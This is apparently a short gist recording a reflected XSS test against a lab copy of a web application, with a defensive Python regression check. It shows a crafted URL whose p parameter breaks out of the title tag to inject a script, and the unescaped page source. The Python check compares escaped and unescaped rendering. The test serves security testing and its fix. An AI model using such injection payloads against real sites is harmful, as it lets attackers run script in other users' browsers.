@FuryKangaroo
Last active August 7, 2018 14:40
An XSS test
First:
When a user opens the following URL directly, the script in the p parameter runs and an alert box pops up.
http://192.168.98.123/www/aaaCraftedWeb-1-master/?p=news%3C/title%3E%3CScRiPt%20%3Ealert(0)%3C/ScRiPt%3E
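Second:
The source of the returned page shows the p value reflected without escaping: it closes the <title> element, and the injected script follows inside <head>.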
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="styles/default/style.css" rel="stylesheet">
<link href="styles/global/style.css" rel="stylesheet">
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<title>YourServer - News</title>
<script>
alert(0)
</script>
</head>
Success!!!!!!
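
A regression check for this reflection, added here as an example (it is not code from the gist or from the application): it decodes the p value from the URL above, renders it into the title both ways, and uses an HTML parser to see whether a script element appears. The string-concatenation template, the helper names and the KNOWN_PAGES allowlist are assumptions, since the server-side code is not shown on the page.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# URL quoted in the write-up above (the host is the author's lab address).
URL = ("http://192.168.98.123/www/aaaCraftedWeb-1-master/"
       "?p=news%3C/title%3E%3CScRiPt%20%3Ealert(0)%3C/ScRiPt%3E")
# Hypothetical allowlist of page names; the application's real set is not on the page.
KNOWN_PAGES = {"home", "news"}


class TagCollector(HTMLParser):
    """Records every start tag the HTML parser sees in a response."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)  # tag names arrive lower-cased


def tags_in(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def p_value(url):
    """URL-decode the p parameter the way the server receives it."""
    return parse_qs(urlsplit(url).query)["p"][0]


def render_unsafe(p):
    # Assumed 'before': the raw parameter is concatenated into <title>.
    return "<head><title>YourServer - " + p + "</title></head>"


def render_escaped(p):
    # Output encoding: <, >, & and quotes become entities, so p stays text.
    return "<head><title>YourServer - " + html.escape(p) + "</title></head>"


def resolve_page(p):
    # Input allowlist: anything that is not a known page falls back to "home".
    return p if p in KNOWN_PAGES else "home"
```

With the decoded value from the URL, the unescaped rendering parses to head, title and script, while the escaped rendering parses to head and title only.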